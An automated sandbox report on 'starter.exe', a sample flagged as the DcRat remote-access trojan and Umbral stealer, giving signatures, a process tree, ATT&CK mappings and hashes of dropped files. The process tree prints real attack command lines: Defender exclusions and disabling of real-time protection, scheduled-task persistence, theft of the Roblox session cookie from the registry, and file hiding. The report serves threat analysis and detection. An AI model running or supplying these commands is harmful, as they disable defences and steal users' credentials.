Overview

overview

10

Static

static

3

starter.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    25s
  • max time network
    31s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2025 07:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    starter.exe

  • Size

    2.7MB

  • MD5

    a2c7f33b3aaf2b9c8c83a6fc8f3557d3

  • SHA1

    2e221f4302dab0406047730b6a00f41ba50026f1

  • SHA256

    dac550df5cc55821ef50537529790217fce473b75d590c5574e4f591faf58e4d

  • SHA512

    0b87aaac5ce731af9626cbc1cb6b57c6c88639c369e6a1b1fbe837cb39492e0d8c62c0413089b505cbbf7682e70291424b845965dbe7152d718f096bb784445c

  • SSDEEP

    49152:BaxMakFibE1xjiFzt/BcB91FpttORQCs1tMfxkmXVamXT:oMiI1tYztSBH/Na5kmXVhT

Score
10/10
dcratumbraldefense_evasiondiscoveryexecutioninfostealerpersistenceratspywarestealertrojan

Malware Config

Signatures

  • DcRat 12 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Dcrat family
    dcrat
  • Detect Umbral payload 2 IoCs
  • Process spawned unexpected child process 6 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 3 IoCs
    defense_evasiontrojan
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • DCRat payload 4 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
    defense_evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Program Files directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Delays execution with timeout.exe 8 IoCs
    defense_evasion
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
    defense_evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 1 IoCs
    defense_evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\starter.exe
    "C:\Users\Admin\AppData\Local\Temp\starter.exe"
    1⤵
    • DcRat
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of WriteProcessMemory
    PID:3832
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\start.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4076
      • C:\Windows\system32\timeout.exe
        timeout 1
        3⤵
        • Delays execution with timeout.exe
        PID:3020
      • C:\Windows\system32\timeout.exe
        timeout 1
        3⤵
        • Delays execution with timeout.exe
        PID:2108
      • C:\Windows\system32\timeout.exe
        timeout 1
        3⤵
        • Delays execution with timeout.exe
        PID:3636
      • C:\Windows\system32\timeout.exe
        timeout 1
        3⤵
        • Delays execution with timeout.exe
        PID:3852
      • C:\Windows\system32\timeout.exe
        timeout 1
        3⤵
        • Delays execution with timeout.exe
        PID:652
      • C:\Windows\system32\timeout.exe
        timeout 1
        3⤵
        • Delays execution with timeout.exe
        PID:316
      • C:\Windows\system32\timeout.exe
        timeout 1
        3⤵
        • Delays execution with timeout.exe
        PID:4516
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:3428
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
      2⤵
      • DcRat
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:372
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /F /TN "Nursultan" /SC ONLOGON /TR "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe" /RL HIGHEST
      2⤵
      • DcRat
      • Scheduled Task/Job: Scheduled Task
      PID:1344
    • C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
      "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
      2⤵
      • DcRat
      • Checks computer location settings
      • Executes dropped EXE
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3972
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Windows\System32\IQz552wvknf.vbe"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2684
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Windows\System32\ihzs31tQ9biU.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4080
          • C:\Windows\SysWOW64\RuntimeBroker.exe
            "C:\Windows\System32\RuntimeBroker.exe"
            5⤵
            • UAC bypass
            • Checks computer location settings
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • System policy modification
            PID:696
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\RuntimeBroker.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4860
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\dotnet\unsecapp.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1156
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\csrss.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2432
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\suxlltqCa3.bat"
              6⤵
                PID:3436
                • C:\Windows\System32\w32tm.exe
                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                  7⤵
                    PID:3356
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svhost.exe'
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2816
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /F /TN "svhost" /SC ONLOGON /TR "C:\Users\Admin\AppData\Local\Temp\svhost.exe" /RL HIGHEST
          2⤵
          • DcRat
          • Scheduled Task/Job: Scheduled Task
          PID:5056
        • C:\Users\Admin\AppData\Local\Temp\svhost.exe
          "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
          2⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3644
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2888
          • C:\Windows\SYSTEM32\attrib.exe
            "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
            3⤵
            • Views/modifies file attributes
            PID:4712
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svhost.exe'
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2944
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2016
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4644
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4444
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" os get Caption
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1840
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" computersystem get totalphysicalmemory
            3⤵
              PID:5012
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" csproduct get uuid
              3⤵
                PID:2004
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                3⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4616
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic" path win32_VideoController get name
                3⤵
                • Detects videocard installed
                PID:956
              • C:\Windows\SYSTEM32\cmd.exe
                "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\svhost.exe" && pause
                3⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Suspicious use of WriteProcessMemory
                PID:4204
                • C:\Windows\system32\PING.EXE
                  ping localhost
                  4⤵
                  • System Network Configuration Discovery: Internet Connection Discovery
                  • Runs ping.exe
                  PID:1892
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Program Files\dotnet\unsecapp.exe'" /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:8
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files\dotnet\unsecapp.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:536
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 11 /tr "'C:\Program Files\dotnet\unsecapp.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:5008
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Photo Viewer\csrss.exe'" /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:700
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\csrss.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2240
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Photo Viewer\csrss.exe'" /rl HIGHEST /f
            1⤵
            • DcRat
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2052

          Network

          MITRE ATT&CK Enterprise v15

          Reconnaissance

          Resource Development

          Initial Access

          Execution

          Command and Scripting Interpreter

          1
          T1059

          PowerShell

          1
          T1059.001

          Scheduled Task/Job

          1
          T1053

          Scheduled Task

          1
          T1053.005

          Persistence

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Scheduled Task/Job

          1
          T1053

          Scheduled Task

          1
          T1053.005

          Privilege Escalation

          Abuse Elevation Control Mechanism

          1
          T1548

          Bypass User Account Control

          1
          T1548.002

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Scheduled Task/Job

          1
          T1053

          Scheduled Task

          1
          T1053.005

          Defense Evasion

          Abuse Elevation Control Mechanism

          1
          T1548

          Bypass User Account Control

          1
          T1548.002

          Hide Artifacts

          1
          T1564

          Hidden Files and Directories

          1
          T1564.001

          Impair Defenses

          1
          T1562

          Disable or Modify Tools

          1
          T1562.001

          Modify Registry

          3
          T1112

          Credential Access

          Credentials from Password Stores

          1
          T1555

          Credentials from Web Browsers

          1
          T1555.003

          Unsecured Credentials

          1
          T1552

          Credentials In Files

          1
          T1552.001

          Discovery

          Query Registry

          2
          T1012

          Remote System Discovery

          1
          T1018

          System Information Discovery

          4
          T1082

          System Location Discovery

          1
          T1614

          System Language Discovery

          1
          T1614.001

          System Network Configuration Discovery

          1
          T1016

          Internet Connection Discovery

          1
          T1016.001

          Lateral Movement

          Collection

          Data from Local System

          1
          T1005

          Command and Control

          Web Service

          1
          T1102

          Exfiltration

          Impact

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\dotnet\unsecapp.exe
            Filesize

            1.3MB

            MD5

            911a071a1ee3bf4c89fb1ff4df886a00

            SHA1

            933fe5a1e52cab88fc2b267f8ebf3c614ada44f0

            SHA256

            da4652964564b3b57d79e813dd36fbd5f2c879f7016b21785744b15854b479f8

            SHA512

            54ee1ea2ab2eca79c7876fb14505d4cddf5b338bd7b15cb2d2bbd80a0352730ef166ca1abf515cdde7572a84666289bb5ce0a5eb6d8f8f7a9c1ad3a370e1c807

            Download Submit

          • C:\ProgramData\start.bat
            Filesize

            560B

            MD5

            d9f6d66c1272661b4dd58799ba2f9e4b

            SHA1

            9ecb2460ec7a3827e62bd6a2e6166306ccd4009b

            SHA256

            be977dae0fbb5f2df0c7779d348378ff4c93e41ccdfe320eadd27ae71ae322bf

            SHA512

            68d1bb80408e48c88d94730170482737e498d48547061910afb72902cae40261294836c243c82d46baca1e3342663a0e5b3d10e9ec6425b7df2bf3f1e34643ab

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            948B

            MD5

            07d142044fb78e359c794180a9c6fdff

            SHA1

            8a7155f93a53ff1b7f382a4ccb3f58ff2f88808e

            SHA256

            2af8c3ca529953085ca25f69d9142964e2ce5508665c14f3533a47d254fed3ea

            SHA512

            356edd3598c09b765c3de325bc47c5c8ae7fcfd87e8c58e12e8bb6437f1d7ce58310e06c4d64336815833e280f2e61c288edb09508c4f29876d28b0d602aeb78

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            276798eeb29a49dc6e199768bc9c2e71

            SHA1

            5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

            SHA256

            cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

            SHA512

            0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            f02abc9024612c398416c2ffc6714cd1

            SHA1

            1dcc103dc68ba954ecd1a2c9229237ebf6534956

            SHA256

            05410dbad347c52be976902e0e1806b07c49de40bc49bedf277a534d38d6762c

            SHA512

            fef6c9a795d2a4e5d927ebc5cffcc01ed3abc199164c084c02a898d8363512709e0fcf460e1178418a5d114ca242ea69ef504794a06f2a1eff8b8ba981e572bc

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            64B

            MD5

            147106b5c9e7527e923a78a9b1e7408b

            SHA1

            d16d1f20dcd9e2516e357b512ec05e9d3261c9d5

            SHA256

            bcdd4fad6fb09e3c729778925c78dbe01397d9b689c9fe12a7455aa2e766d1cc

            SHA512

            33123f347e5ec4f461ee3b6b8eb2c47490f82b9529c7c626ebb3764af276f7c379ec923e8722198c16b48af3723a84ce0b8e258f01c9bc8a65f6ae38f16518bc

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            96ff1ee586a153b4e7ce8661cabc0442

            SHA1

            140d4ff1840cb40601489f3826954386af612136

            SHA256

            0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

            SHA512

            3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            bd5940f08d0be56e65e5f2aaf47c538e

            SHA1

            d7e31b87866e5e383ab5499da64aba50f03e8443

            SHA256

            2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

            SHA512

            c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            cae60f0ddddac635da71bba775a2c5b4

            SHA1

            386f1a036af61345a7d303d45f5230e2df817477

            SHA256

            b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16

            SHA512

            28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            7a451cd1316d70a65910773fee8c3a43

            SHA1

            d2db32d5037153dd1d94565b51b5b385817a3c3d

            SHA256

            862d25ed22075f3d1f5e8d29a3c6e050dc91e53a4dc653c3f0f7c627a12ee26c

            SHA512

            60887f795036fbd6d25234c17dab4463a8a02f576ae8c07dd7b4c4ff1dba35f99b7301139ea051a7a80fdfc9e003a2f0c2dd0d444a82ecf87a3df21507332aa6

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
            Filesize

            1.6MB

            MD5

            f45ee5d7c5c0312d499597d1f9837aae

            SHA1

            157345d1fd448536ec8872793311af7cfa38b929

            SHA256

            1f4c7ec8eb27bbcef32e752de909021ee0a17e659051d5db9abfe36243fc8b4e

            SHA512

            8efd87dfa66e11ea3a2e88fed8c5b68c026fcf86f44ebd236fe254cd0bb6264c1fb709f26f02af1c85282505e76900d26e64671c3e376d16b03e4389efda3b8c

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vi3gtexv.dhj.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\null
            Filesize

            56B

            MD5

            a73fee14fd30d4476f73241f1a5abfd1

            SHA1

            cc516b4047c42506e5cc53013ad5b084f33506d2

            SHA256

            a31c73ccbf32777dca9ff9ec868eff833e16d2418e14d7e4977a49c435446081

            SHA512

            5db81f7d4ba2c50f87af7604e0be76a8957e54a32e35431dcab63e37c2a4e3ffe51a401ad80c431d8db43ae4b360b8172ba2a1832f79cad2e68a22d10bd6b79e

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\suxlltqCa3.bat
            Filesize

            201B

            MD5

            a34f60b7ad3866de45365a6cfa58da1c

            SHA1

            72235a3520de89be549546da3b5f359b4dbcf499

            SHA256

            a78e918c07758865aa4b01f99185deab88900e5b534595fc18dba049c42e6849

            SHA512

            eb7dc549cd90d92c10b399c6571d3603e6ad9e78983eed92a64804dd4433bafc114e82f83a29e117baa0a3d3be0508e47564c1fdbafb815246a1855a713a75cb

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\svhost.exe
            Filesize

            229KB

            MD5

            b90373b141c34acd94ff79fe1ea22393

            SHA1

            bd364cc545e760536e45fe53db8c49ea3f80f4b2

            SHA256

            fb8e288bf6577db583bfaef1e898f79cafa858a962035b0e0bdacf82ff9c17d0

            SHA512

            4fe0e29e45ff3d362666fccb4dc1704a483ca8beb95b965c27262dde112d8180d8f08fde4672605fafdd2ceeac4213eed8dd74f5c3e0783098d73881aaa63470

            Download Submit

          • C:\Windows\SysWOW64\IQz552wvknf.vbe
            Filesize

            206B

            MD5

            bdb68ea31375551514c46a7d3964ee97

            SHA1

            9b00777ca2d514e602e014b254b52ebc84e049d2

            SHA256

            d7d1b2b9ac647deb6eb4b6c84043863b15d02147b15421b5964980bbdf7f6269

            SHA512

            44b5ac35b05cd8cbe367dea462c9f9c9d173fc1d75a29687c2e0c4b2b833a97721aba7acd1377afc2ea31827c107f7ec61d7b8efb908d88bd00736c21dfa2ff0

            Download Submit

          • C:\Windows\SysWOW64\RuntimeBroker.exe
            Filesize

            1.3MB

            MD5

            4233e848525f18011d4b952b0ef01e22

            SHA1

            e3dbad764a55d590b64abb7da319d40d6215ee9a

            SHA256

            0c3eae8eae772bf6ae5e0ee0644c5776b41e2943fb4bf55d59d4f8ba51e3dced

            SHA512

            ebbe3cbaa3b39152b932b9e358aa15e53e587f68dc73abfb6dabab19d588036677916ad7a2205cbdae55d2b26c095d26f3f7845ecfd9ece6a57274a8d468ca89

            Download Submit

          • C:\Windows\SysWOW64\ihzs31tQ9biU.bat
            Filesize

            39B

            MD5

            0db41c19e8f41b90316f89f464b35b76

            SHA1

            d0ae83d781737763f59193ddc30e18671d7b9464

            SHA256

            fb631333c877e848cdd7832644eb8a1a79fb62e59196c8f333033c0a0c559948

            SHA512

            a102d76bf897f5e3f0569e6269c5e725caa4ec24eda01424e7dbc86ca5cca95b363b6cc6fdfb66769fc2bca6a7df65a5affd70e677ff935f08491449cdf6f66f

            Download Submit

          • memory/372-25-0x00007FFE57050000-0x00007FFE57B11000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/372-21-0x00007FFE57050000-0x00007FFE57B11000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/372-11-0x000001833AAE0000-0x000001833AB02000-memory.dmp

            Filesize

            136KB

            Download

          • memory/372-10-0x00007FFE57050000-0x00007FFE57B11000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/372-9-0x00007FFE57050000-0x00007FFE57B11000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/696-168-0x000000001DAC0000-0x000000001DAD0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/696-171-0x000000001E020000-0x000000001E548000-memory.dmp

            Filesize

            5.2MB

            Download

          • memory/696-174-0x000000001DB10000-0x000000001DB1C000-memory.dmp

            Filesize

            48KB

            Download

          • memory/696-173-0x000000001DB00000-0x000000001DB0C000-memory.dmp

            Filesize

            48KB

            Download

          • memory/696-172-0x000000001DAF0000-0x000000001DAFE000-memory.dmp

            Filesize

            56KB

            Download

          • memory/696-170-0x000000001DAE0000-0x000000001DAF2000-memory.dmp

            Filesize

            72KB

            Download

          • memory/696-169-0x000000001DAD0000-0x000000001DADA000-memory.dmp

            Filesize

            40KB

            Download

          • memory/696-167-0x000000001DAB0000-0x000000001DAB8000-memory.dmp

            Filesize

            32KB

            Download

          • memory/696-163-0x0000000000BD0000-0x0000000000D2C000-memory.dmp

            Filesize

            1.4MB

            Download

          • memory/696-164-0x000000001B9E0000-0x000000001B9EE000-memory.dmp

            Filesize

            56KB

            Download

          • memory/696-165-0x000000001B9F0000-0x000000001B9FE000-memory.dmp

            Filesize

            56KB

            Download

          • memory/696-166-0x000000001DAA0000-0x000000001DAA8000-memory.dmp

            Filesize

            32KB

            Download

          • memory/3644-66-0x000001D670D80000-0x000001D670DC0000-memory.dmp

            Filesize

            256KB

            Download

          • memory/3644-97-0x000001D6734F0000-0x000001D673566000-memory.dmp

            Filesize

            472KB

            Download

          • memory/3644-99-0x000001D673380000-0x000001D67339E000-memory.dmp

            Filesize

            120KB

            Download

          • memory/3644-138-0x000001D673670000-0x000001D673682000-memory.dmp

            Filesize

            72KB

            Download

          • memory/3644-137-0x000001D672B20000-0x000001D672B2A000-memory.dmp

            Filesize

            40KB

            Download

          • memory/3644-98-0x000001D672B40000-0x000001D672B90000-memory.dmp

            Filesize

            320KB

            Download

          • memory/3832-0-0x00007FFE57053000-0x00007FFE57055000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3832-68-0x00007FFE57050000-0x00007FFE57B11000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3832-4-0x000000001C040000-0x000000001C172000-memory.dmp

            Filesize

            1.2MB

            Download

          • memory/3832-3-0x00007FFE57050000-0x00007FFE57B11000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3832-2-0x0000000001760000-0x0000000001761000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3832-1-0x0000000000A70000-0x0000000000FC2000-memory.dmp

            Filesize

            5.3MB

            Download